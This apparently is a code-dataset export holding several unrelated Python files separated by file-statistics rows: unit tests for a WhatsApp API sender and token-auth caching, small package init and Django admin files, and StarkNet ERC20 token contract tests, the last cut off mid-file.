            reverse("whatsapp-events", args=[self.channel.channel_id]),
            json.dumps(post_inbound),
            content_type="application/json",
            HTTP_X_ENGAGE_HOOK_SIGNATURE=self.generate_signature(
                json.dumps(post_inbound)
            ),
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        # An Inbound record is created, linked to the looked-up identity.
        d = Inbound.objects.last()
        self.assertIsNotNone(d.id)
        self.assertEqual(d.message_id, message_id)
        self.assertEqual(d.from_identity, identity_uuid)
        self.assertEqual(d.content, "Test message")
class TestWhatsAppAPISender(TestCase):
    """Tests for the WhatsAppApiSender factory/client.

    WhatsAppApiSender is constructed as (api_url, token, hsm_namespace,
    hsm_element_name, ttl); HSM-related tests pass the last three, plain-text
    tests pass None for them.
    """

    def test_send_text_to_send_text_message(self):
        """
        send_text should delegate to send_text_message when there is no HSM
        setup.
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        sender.send_text_message = MagicMock(
            return_value={"messages": [{"id": "message-id"}]}
        )
        sender.send_text("+27820001001", "Test message")
        # The leading "+" is stripped before the address is passed on.
        sender.send_text_message.assert_called_once_with("27820001001", "Test message")

    def test_send_text_to_send_hsm(self):
        """
        send_text should delegate to send_hsm when there are HSM config values.
        """
        sender = WhatsAppApiSender(
            "http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
        )
        sender.send_hsm = MagicMock(return_value={"messages": [{"id": "message-id"}]})
        sender.send_text("+27820001001", "Test message")
        sender.send_hsm.assert_called_once_with("27820001001", "Test message")

    def test_send_text_to_send_custom_hsm(self):
        """
        send_text should delegate to send_custom_hsm when there is a 'template'
        key inside the message metadata.
        """
        sender = WhatsAppApiSender(
            "http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
        )
        sender.send_custom_hsm = MagicMock(
            return_value={"messages": [{"id": "message-id"}]}
        )
        sender.send_text(
            "+27820001001",
            "Test message",
            metadata={
                "template": {
                    "name": "sbm",
                    "language": "afr_ZA",
                    "variables": ["variable1", "variable2"],
                }
            },
        )
        # Template name, language and variables are unpacked from the metadata.
        sender.send_custom_hsm.assert_called_once_with(
            "27820001001", "sbm", "afr_ZA", ["variable1", "variable2"]
        )

    def test_send_text_unknown_contact(self):
        """
        If the sending fails with a unknown contact error, contact_check should
        be called then the send should be retried.
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        sender.get_contact = MagicMock(return_value="27820001001")
        # First response carries error code 1006 (unknown contact).
        sender.send_text_message = MagicMock(
            return_value={
                "errors": [
                    {
                        "code": 1006,
                        "details": "unknown contact",
                        "title": "Resource not found",
                    }
                ],
                "messages": [{"id": "message-id"}],
            }
        )
        sender.send_text("+27820001001", "Test message")
        sender.get_contact.assert_called_with("+27820001001")
        # The send is attempted, then retried after the contact check.
        sender.send_text_message.assert_has_calls(
            [call("27820001001", "Test message"), call("27820001001", "Test message")]
        )

    def test_send_image(self):
        """
        send_image should raise an API sender exception as it is not supported
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        self.assertRaises(
            WhatsAppApiSenderException,
            sender.send_image,
            "+27820001001",
            "Test message",
            "http://example.jpg",
        )

    def test_send_voice(self):
        """
        send_voice should raise an API sender exception as it is not supported
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        self.assertRaises(
            WhatsAppApiSenderException,
            sender.send_voice,
            "+27820001001",
            "Test message",
            "http://example.mp3",
        )

    def test_fire_metric(self):
        """
        fire_metric should raise an API sender exception as it is not supported
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        self.assertRaises(
            WhatsAppApiSenderException, sender.fire_metric, "test.metric", 7
        )

    @responses.activate
    def test_get_contact_exists(self):
        """
        get_contact should make the appropriate request to the WhatsApp API, and return
        the contact ID.
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        responses.add(
            method=responses.POST,
            url="http://whatsapp/v1/contacts",
            json={
                "contacts": [
                    {"input": "+27820001001", "status": "valid", "wa_id": "27820001001"}
                ]
            },
            status=200,
        )
        self.assertEqual(sender.get_contact("+27820001001"), "27820001001")
        # Inspect the outgoing request: bearer auth and blocking contact check.
        request = responses.calls[-1].request
        self.assertEqual(request.headers["Authorization"], "Bearer test-token")
        self.assertEqual(
            json.loads(request.body), {"blocking": "wait", "contacts": ["+27820001001"]}
        )

    @responses.activate
    def test_get_contact_not_exists(self):
        """
        get_contact should make the appropriate request to the WhatsApp API, and trigger
        a webhook if the contact doesn't exist
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        responses.add(
            method=responses.POST,
            url="http://whatsapp/v1/contacts",
            json={"contacts": [{"input": "+27820001001", "status": "invalid"}]},
            status=200,
        )
        # A registered hook for the failed-contact-check event should be fired.
        user = User.objects.create_user("testuser")
        hook = Hook.objects.create(
            event="whatsapp.failed_contact_check", target="http://webhook", user=user
        )
        responses.add(method=responses.POST, url="http://webhook", json={}, status=200)
        self.assertEqual(sender.get_contact("+27820001001"), None)
        # Second-to-last call: the contact check against the WhatsApp API.
        request = responses.calls[-2].request
        self.assertEqual(request.headers["Authorization"], "Bearer test-token")
        self.assertEqual(
            json.loads(request.body), {"blocking": "wait", "contacts": ["+27820001001"]}
        )
        # Last call: the webhook delivery with the failing address.
        webhook = responses.calls[-1].request
        self.assertEqual(
            json.loads(webhook.body),
            {"hook": hook.dict(), "data": {"address": "+27820001001"}},
        )

    @responses.activate
    def test_send_hsm(self):
        """
        send_hsm should make the appropriate request to the WhatsApp API
        """
        sender = WhatsAppApiSender(
            "http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", 604800
        )
        responses.add(
            method=responses.POST,
            url="http://whatsapp/v1/messages",
            json={"messages": [{"id": "message-id"}]},
        )
        sender.send_hsm("27820001001", "Test message")
        # The configured namespace/element name and ttl go into the payload,
        # with the message text as the single localizable parameter.
        request = responses.calls[-1].request
        self.assertEqual(request.headers["Authorization"], "Bearer test-token")
        self.assertEqual(
            json.loads(request.body),
            {
                "to": "27820001001",
                "ttl": 604800,
                "type": "hsm",
                "hsm": {
                    "namespace": "hsm-namespace",
                    "element_name": "hsm-element-name",
                    "localizable_params": [{"default": "Test message"}],
                },
            },
        )

    @responses.activate
    def test_send_custom_hsm(self):
        """
        send_custom_hsm should make the appropriate request to the WhatsApp API
        """
        sender = WhatsAppApiSender(
            "http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", 604800
        )
        responses.add(
            method=responses.POST,
            url="http://whatsapp/v1/messages",
            json={"messages": [{"id": "message-id"}]},
        )
        sender.send_custom_hsm(
            "27820001001", "sbm", "eng_ZA", ["variable1", "variable2"]
        )
        # The supplied element name, language and variables override the
        # configured defaults in the payload.
        request = responses.calls[-1].request
        self.assertEqual(request.headers["Authorization"], "Bearer test-token")
        self.assertEqual(
            json.loads(request.body),
            {
                "to": "27820001001",
                "ttl": 604800,
                "type": "hsm",
                "hsm": {
                    "namespace": "hsm-namespace",
                    "element_name": "sbm",
                    "language": {"policy": "deterministic", "code": "eng_ZA"},
                    "localizable_params": [
                        {"default": "variable1"},
                        {"default": "variable2"},
                    ],
                },
            },
        )

    @responses.activate
    def test_send_hsm_unknown_contact(self):
        """
        send_hsm should return the appropriate body when there is a unknown
        contact error returned by the API.
        """
        sender = WhatsAppApiSender(
            "http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
        )
        # Error code 1006 ("unknown contact") with a 404 is returned as a
        # body instead of raising, so the caller can handle the retry.
        responses.add(
            method=responses.POST,
            url="http://whatsapp/v1/messages",
            json={
                "errors": [
                    {
                        "code": 1006,
                        "details": "unknown contact",
                        "title": "Resource not found",
                    }
                ],
                "meta": {"version": "2.19.4", "api_status": "stable"},
            },
            status=404,
        )
        response = sender.send_hsm("27820001001", "Test message")
        self.assertEqual(response["errors"][0]["code"], 1006)
        self.assertEqual(response["errors"][0]["details"], "unknown contact")

    @responses.activate
    def test_send_hsm_http_error(self):
        """
        send_hsm should re-raise the HTTPError if it is not handled
        """
        sender = WhatsAppApiSender(
            "http://whatsapp", "test-token", "hsm-namespace", "hsm-element-name", "ttl"
        )
        # Any error code other than 1006 is not handled and must propagate.
        responses.add(
            method=responses.POST,
            url="http://whatsapp/v1/messages",
            json={
                "errors": [
                    {
                        "code": 88,
                        "details": "broken flux capacitor",
                        "title": "Resource broken",
                    }
                ],
                "meta": {"version": "2.19.4", "api_status": "stable"},
            },
            status=404,
        )
        self.assertRaises(
            requests_exceptions.HTTPError,
            sender.send_hsm,
            "27820001001",
            "Test message",
        )

    @responses.activate
    def test_send_text_message(self):
        """
        send_text_message should make the appropriate request to the WhatsApp API
        """
        sender = WhatsAppApiSender("http://whatsapp", "test-token", None, None, None)
        responses.add(
            method=responses.POST,
            url="http://whatsapp/v1/messages",
            json={"messages": [{"id": "message-id"}]},
        )
        sender.send_text_message("27820001001", "Test message")
        request = responses.calls[-1].request
        self.assertEqual(request.headers["Authorization"], "Bearer test-token")
        self.assertEqual(
            json.loads(request.body),
            {"to": "27820001001", "text": {"body": "Test message"}},
        )
class CachedTokenAuthenticationTests(TestCase):
    """Tests for the caching token-authentication backend."""

    url = reverse("outbound-list")

    def test_auth_required(self):
        """
        Ensure that the view we're testing actually requires token auth
        """
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_caching_working(self):
        """
        Ensure that the second time we make a request, there's no database hit
        """
        token = Token.objects.create(user=User.objects.create_user("test"))
        auth_header = "Token {}".format(token.key)
        # First request: the token lookup hits the database.
        with self.assertNumQueries(2):
            first = self.client.get(self.url, HTTP_AUTHORIZATION=auth_header)
        self.assertEqual(first.status_code, status.HTTP_200_OK)
        # Second request: one fewer query, the auth lookup is cached.
        with self.assertNumQueries(1):
            second = self.client.get(self.url, HTTP_AUTHORIZATION=auth_header)
        self.assertEqual(second.status_code, status.HTTP_200_OK)
| 36.325429 | 89 | 0.588788 | 17,317 | 160,849 | 5.273373 | 0.047988 | 0.075067 | 0.026106 | 0.021638 | 0.81223 | 0.777407 | 0.745847 | 0.722303 | 0.702559 | 0.683483 | 0 | 0.037972 | 0.289421 | 160,849 | 4,427 | 90 | 36.333635 | 0.760998 | 0.077514 | 0 | 0.643002 | 0 | 0 | 0.189636 | 0.028289 | 0 | 0 | 0 | 0.000226 | 0.162851 | 1 | 0.054767 | false | 0.005506 | 0.010722 | 0.001159 | 0.081715 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
96b8e4a99a5b92e01aed7760b4d6121f84a840b2 | 28 | py | Python | src/stk/serialization/__init__.py | stevenbennett96/stk | 6e5af87625b83e0bfc7243bc42d8c7a860cbeb76 | [
"MIT"
] | 21 | 2018-04-12T16:25:24.000Z | 2022-02-14T23:05:43.000Z | src/stk/serialization/__init__.py | stevenbennett96/stk | 6e5af87625b83e0bfc7243bc42d8c7a860cbeb76 | [
"MIT"
] | 8 | 2019-03-19T12:36:36.000Z | 2020-11-11T12:46:00.000Z | src/stk/serialization/__init__.py | stevenbennett96/stk | 6e5af87625b83e0bfc7243bc42d8c7a860cbeb76 | [
"MIT"
] | 5 | 2018-08-07T13:00:16.000Z | 2021-11-01T00:55:10.000Z | from .json import * # noqa
| 14 | 27 | 0.642857 | 4 | 28 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25 | 28 | 1 | 28 | 28 | 0.857143 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7379a66f70f56e1e445af6d3ed36a1797d2ccf11 | 27 | py | Python | supsmu/__init__.py | jakevdp/supsmu | c9763dd7f5dbe1b037fb78b1378edc64b945ec35 | [
"CNRI-Python"
] | 5 | 2015-01-27T21:28:09.000Z | 2021-08-29T05:58:13.000Z | supsmu/__init__.py | jakevdp/supsmu | c9763dd7f5dbe1b037fb78b1378edc64b945ec35 | [
"CNRI-Python"
] | null | null | null | supsmu/__init__.py | jakevdp/supsmu | c9763dd7f5dbe1b037fb78b1378edc64b945ec35 | [
"CNRI-Python"
] | 1 | 2021-08-29T05:58:14.000Z | 2021-08-29T05:58:14.000Z | from .supsmu import supsmu
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fbd6bf5bfda1fd7636762e23d78a4dfb9a6bcd6e | 29 | py | Python | pynars/NARS/__init__.py | AIxer/PyNARS | 443b6a5e1c9779a1b861df1ca51ce5a190998d2e | [
"MIT"
] | null | null | null | pynars/NARS/__init__.py | AIxer/PyNARS | 443b6a5e1c9779a1b861df1ca51ce5a190998d2e | [
"MIT"
] | null | null | null | pynars/NARS/__init__.py | AIxer/PyNARS | 443b6a5e1c9779a1b861df1ca51ce5a190998d2e | [
"MIT"
] | null | null | null | from .Control import Reasoner | 29 | 29 | 0.862069 | 4 | 29 | 6.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103448 | 29 | 1 | 29 | 29 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
838c59be6ae74bd13ed293ede3c7ce802f29c3bc | 174 | py | Python | src/tvmserver/admin.py | rxvt/basic_tvm | 4c1a5d5b39f0b0be28c5f1e62c56d148d1db1653 | [
"MIT"
] | null | null | null | src/tvmserver/admin.py | rxvt/basic_tvm | 4c1a5d5b39f0b0be28c5f1e62c56d148d1db1653 | [
"MIT"
] | null | null | null | src/tvmserver/admin.py | rxvt/basic_tvm | 4c1a5d5b39f0b0be28c5f1e62c56d148d1db1653 | [
"MIT"
] | null | null | null | from django.contrib import admin
from tvmserver.models import Command
# Register your models here.
@admin.register(Command)
class CommandAdmin(admin.ModelAdmin):
    """Stock Django admin registration for the ``Command`` model.

    No customisation (``list_display``, filters, search, …) is configured;
    the default ``ModelAdmin`` behaviour is used as-is.
    """
    pass
| 17.4 | 37 | 0.793103 | 22 | 174 | 6.272727 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 174 | 9 | 38 | 19.333333 | 0.92 | 0.149425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
83fd0fabf38f5d35176e41e3f1c735c9f817be6d | 121 | py | Python | vetor.py | adeniasfilho/dio-desafio-github-primeiro-repositorio | 445c56065c01642b16fda2a5919407e260cd8349 | [
"MIT"
] | null | null | null | vetor.py | adeniasfilho/dio-desafio-github-primeiro-repositorio | 445c56065c01642b16fda2a5919407e260cd8349 | [
"MIT"
] | null | null | null | vetor.py | adeniasfilho/dio-desafio-github-primeiro-repositorio | 445c56065c01642b16fda2a5919407e260cd8349 | [
"MIT"
] | null | null | null | N = [0,0,0,0,0,0,0,0,0,0]
x = int(input())
for i in range(10):
N[i]=x
x = x * 2
print('N[{}] = {} '.format(i,N[i])) | 20.166667 | 37 | 0.446281 | 31 | 121 | 1.741935 | 0.419355 | 0.333333 | 0.444444 | 0.518519 | 0.185185 | 0.185185 | 0.185185 | 0.185185 | 0.185185 | 0 | 0 | 0.135417 | 0.206612 | 121 | 6 | 37 | 20.166667 | 0.427083 | 0 | 0 | 0 | 0 | 0 | 0.090164 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
790b5eaa8022d14560bfc4707727abb81d0adce1 | 21,056 | py | Python | src/starkware/starknet/apps/starkgate/cairo/token_test.py | starkware-libs/starkgate-contracts | 28f4032b101003b2c6682d753ea61c86b732012c | [
"Apache-2.0"
] | 9 | 2022-01-27T20:20:06.000Z | 2022-03-29T12:05:57.000Z | src/starkware/starknet/apps/starkgate/cairo/token_test.py | starkware-libs/starkgate-contracts | 28f4032b101003b2c6682d753ea61c86b732012c | [
"Apache-2.0"
] | 2 | 2022-02-16T17:05:56.000Z | 2022-02-16T17:06:54.000Z | src/starkware/starknet/apps/starkgate/cairo/token_test.py | starkware-libs/starkgate-contracts | 28f4032b101003b2c6682d753ea61c86b732012c | [
"Apache-2.0"
] | 1 | 2022-02-03T13:39:44.000Z | 2022-02-03T13:39:44.000Z | import asyncio
import copy
import random
from typing import Callable
import pytest
from starkware.starknet.apps.starkgate.cairo.contracts import erc20_contract_def
from starkware.starknet.apps.starkgate.conftest import str_to_felt
from starkware.starknet.testing.contract import StarknetContract
from starkware.starknet.testing.starknet import Starknet
from starkware.starkware_utils.error_handling import StarkException
AMOUNT_BOUND = 2 ** 256
GOVERNOR_ADDRESS = str_to_felt("GOVERNOR")
MINTER_ADDRESS = str_to_felt("MINTER")
L1_ACCOUNT = 1
initial_balances = {1: 13, 2: 10}
uninitialized_account = 3
initial_total_supply = sum(initial_balances.values())
initialized_account = random.choice(list(initial_balances.keys()))
another_account = 4 # Not initialized_account and not uninitialized_account.
# 0 < TRANSFER_AMOUNT < APPROVE_AMOUNT < initial_balance < HIGH_APPROVE_AMOUNT.
TRANSFER_AMOUNT = int((initial_balances[initialized_account] + 1) / 2)
APPROVE_AMOUNT = 8
HIGH_APPROVE_AMOUNT = 100
MINT_AMOUNT = 10
BURN_AMOUNT = int((initial_balances[initialized_account] + 1) / 2)
@pytest.fixture(scope="session")
def event_loop():
    """Provide a single session-wide asyncio event loop.

    Session-scoped async fixtures below need a loop that outlives one test,
    so this replaces the default function-scoped loop fixture.
    """
    loop = asyncio.get_event_loop()
    yield loop
    # Close the loop only after the whole test session finishes.
    loop.close()
@pytest.fixture(scope="session")
async def session_starknet() -> Starknet:
return await Starknet.empty()
@pytest.fixture(scope="session")
async def session_empty_token_contract(
session_starknet: Starknet,
token_name: int,
token_symbol: int,
token_decimals: int,
) -> StarknetContract:
return await session_starknet.deploy(
constructor_calldata=[
token_name,
token_symbol,
token_decimals,
MINTER_ADDRESS,
],
contract_def=erc20_contract_def,
)
@pytest.fixture(scope="session")
async def uint256(session_empty_token_contract: StarknetContract) -> Callable:
    """Return a converter from Python int to the contract's Uint256 struct."""
    def convert_int_to_uint256(num: int):
        # Negative inputs are wrapped modulo 2**256 (two's-complement view).
        if num < 0:
            num += 2 ** 256
        # Split into the (low, high) pair of 128-bit limbs the ABI expects.
        return session_empty_token_contract.Uint256(low=num % 2 ** 128, high=num // 2 ** 128)
    return convert_int_to_uint256
@pytest.fixture(scope="session")
async def session_token_contract(
session_empty_token_contract: StarknetContract,
uint256: Callable,
) -> StarknetContract:
for account in initial_balances:
await session_empty_token_contract.permissionedMint(
recipient=account, amount=uint256(initial_balances[account])
).invoke(caller_address=MINTER_ADDRESS)
return session_empty_token_contract
@pytest.fixture
async def starknet(session_starknet: Starknet) -> Starknet:
return copy.deepcopy(session_starknet)
@pytest.fixture
async def token_contract(
    starknet: Starknet, session_token_contract: StarknetContract
) -> StarknetContract:
    """Re-bind the session-deployed ERC20 contract onto this test's state copy.

    Reuses the session deployment's address/ABI while pointing at the
    per-test deep-copied ``starknet.state``, so tests cannot leak state
    into one another.
    """
    return StarknetContract(
        state=starknet.state,
        abi=erc20_contract_def.abi,
        contract_address=session_token_contract.contract_address,
        deploy_execution_info=session_token_contract.deploy_execution_info,
    )
@pytest.mark.asyncio
async def test_permitted_minter(token_contract: StarknetContract):
execution_info = await token_contract.permittedMinter().call()
assert execution_info.result == (MINTER_ADDRESS,)
@pytest.mark.asyncio
async def test_name(token_contract: StarknetContract, token_name: int):
execution_info = await token_contract.name().call()
assert execution_info.result == (token_name,)
@pytest.mark.asyncio
async def test_symbol(token_contract: StarknetContract, token_symbol: int):
execution_info = await token_contract.symbol().call()
assert execution_info.result == (token_symbol,)
@pytest.mark.asyncio
async def test_decimal(token_contract: StarknetContract, token_decimals: int):
execution_info = await token_contract.decimals().call()
assert execution_info.result == (token_decimals,)
@pytest.mark.asyncio
async def test_total_supply(token_contract: StarknetContract, uint256: Callable):
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply),)
@pytest.mark.asyncio
async def test_balance_of(token_contract: StarknetContract, uint256: Callable):
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (uint256(initial_balances[initialized_account]),)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (uint256(0),)
@pytest.mark.asyncio
async def test_transfer_zero_sender(token_contract: StarknetContract, uint256: Callable):
    """A transfer invoked with caller address 0 must fail the sender != 0 check."""
    amount = uint256(TRANSFER_AMOUNT)
    # Use a raw string for the regex: "\(" in a normal string literal is an
    # invalid escape sequence (DeprecationWarning today, a SyntaxError in
    # future Python versions).
    with pytest.raises(StarkException, match=r"assert_not_zero\(sender\)"):
        await token_contract.transfer(recipient=uninitialized_account, amount=amount).invoke(
            caller_address=0
        )
@pytest.mark.asyncio
async def test_transfer_zero_recipient(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert_not_zero\(recipient\)"):
await token_contract.transfer(recipient=0, amount=uint256(TRANSFER_AMOUNT)).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_transfer_amount_bigger_than_balance(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(initial_balances[initialized_account] + 1)
with pytest.raises(StarkException, match="assert_not_zero\(enough_balance\)"):
await token_contract.transfer(recipient=uninitialized_account, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_transfer_invalid_uint256_amount(token_contract: StarknetContract, uint256: Callable):
amount = uint256(AMOUNT_BOUND)
with pytest.raises(StarkException, match="uint256_check\(amount\)"):
await token_contract.transfer(recipient=uninitialized_account, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_transfer_happy_flow(token_contract: StarknetContract, uint256: Callable):
transfer_amount = uint256(TRANSFER_AMOUNT)
await token_contract.transfer(recipient=uninitialized_account, amount=transfer_amount).invoke(
caller_address=initialized_account
)
expected_balance = uint256(initial_balances[initialized_account] - TRANSFER_AMOUNT)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (expected_balance,)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (transfer_amount,)
execution_info = await token_contract.totalSupply().call()
assert execution_info.result == (uint256(initial_total_supply),)
await token_contract.transfer(recipient=initialized_account, amount=transfer_amount).invoke(
caller_address=uninitialized_account
)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (uint256(initial_balances[initialized_account]),)
execution_info = await token_contract.balanceOf(account=uninitialized_account).call()
assert execution_info.result == (uint256(0),)
# Tests the case of sender = recipient.
await token_contract.transfer(recipient=initialized_account, amount=transfer_amount).invoke(
caller_address=initialized_account
)
execution_info = await token_contract.balanceOf(account=initialized_account).call()
assert execution_info.result == (uint256(initial_balances[initialized_account]),)
@pytest.mark.asyncio
async def test_approve_zero_owner(token_contract: StarknetContract, uint256: Callable):
amount = uint256(APPROVE_AMOUNT)
with pytest.raises(StarkException, match="assert_not_zero\(caller\)"):
await token_contract.approve(spender=uninitialized_account, amount=amount).invoke(
caller_address=0
)
@pytest.mark.asyncio
async def test_approve_zero_spender(token_contract: StarknetContract, uint256: Callable):
amount = uint256(APPROVE_AMOUNT)
with pytest.raises(StarkException, match="assert_not_zero\(spender\)"):
await token_contract.approve(spender=0, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_approve_invalid_uint256_amount(token_contract: StarknetContract, uint256: Callable):
amount = uint256(AMOUNT_BOUND)
with pytest.raises(StarkException, match="uint256_check\(amount\)"):
await token_contract.approve(spender=uninitialized_account, amount=amount).invoke(
caller_address=initialized_account
)
@pytest.mark.asyncio
async def test_approve_happy_flow(token_contract: StarknetContract, uint256: Callable):
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(0),)
await token_contract.approve(
spender=uninitialized_account, amount=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
execution_info = await token_contract.allowance(
owner=initialized_account, spender=uninitialized_account
).call()
assert execution_info.result == (uint256(APPROVE_AMOUNT),)
@pytest.mark.asyncio
async def test_transfer_from_zero_sender(token_contract: StarknetContract, uint256: Callable):
# The contract fails when checking for sufficient allowance of account 0.
# Only because we cannot put a balance for address(0) or approve on its behalf.
# Could we do that, we would have failed on the more sensible error assert_not_zero(sender).
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.transferFrom(
sender=0, recipient=uninitialized_account, amount=uint256(TRANSFER_AMOUNT)
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_zero_recipient(token_contract: StarknetContract, uint256: Callable):
amount = uint256(TRANSFER_AMOUNT)
await token_contract.approve(spender=another_account, amount=uint256(TRANSFER_AMOUNT)).invoke(
caller_address=initialized_account
)
with pytest.raises(StarkException, match="assert_not_zero\(recipient\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=0, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_amount_bigger_than_balance(
token_contract: StarknetContract, uint256: Callable
):
await token_contract.approve(
spender=another_account, amount=uint256(HIGH_APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
amount = uint256(initial_balances[initialized_account] + 1)
with pytest.raises(StarkException, match="assert_not_zero\(enough_balance\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_amount_bigger_than_allowance(
token_contract: StarknetContract, uint256: Callable
):
await token_contract.approve(spender=another_account, amount=uint256(APPROVE_AMOUNT)).invoke(
caller_address=initialized_account
)
amount = uint256(APPROVE_AMOUNT + 1)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_transfer_from_invalid_uint256_amount(
token_contract: StarknetContract, uint256: Callable
):
amount = uint256(AMOUNT_BOUND)
with pytest.raises(StarkException, match="assert_not_zero\(enough_allowance\)"):
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=amount
).invoke(caller_address=another_account)
@pytest.mark.asyncio
@pytest.mark.parametrize("approve_num", [APPROVE_AMOUNT, HIGH_APPROVE_AMOUNT])
async def test_transfer_from_happy_flow(
token_contract: StarknetContract, uint256: Callable, approve_num: int
):
await token_contract.approve(spender=another_account, amount=uint256(approve_num)).invoke(
caller_address=initialized_account
)
await token_contract.transferFrom(
sender=initialized_account, recipient=uninitialized_account, amount=uint256(TRANSFER_AMOUNT)
).invoke(caller_address=another_account)
@pytest.mark.asyncio
async def test_increase_allowance_zero_spender(token_contract: StarknetContract, uint256: Callable):
with pytest.raises(StarkException, match="assert_not_zero\(spender\)"):
await token_contract.increaseAllowance(
spender=0, added_value=uint256(APPROVE_AMOUNT)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_increase_allowance_invalid_amount(
token_contract: StarknetContract, uint256: Callable
):
with pytest.raises(StarkException, match="uint256_check\(added_value\)"):
await token_contract.increaseAllowance(
spender=uninitialized_account, added_value=uint256(AMOUNT_BOUND)
).invoke(caller_address=initialized_account)
@pytest.mark.asyncio
async def test_increase_allowance_overflow(token_contract: StarknetContract, uint256: Callable):
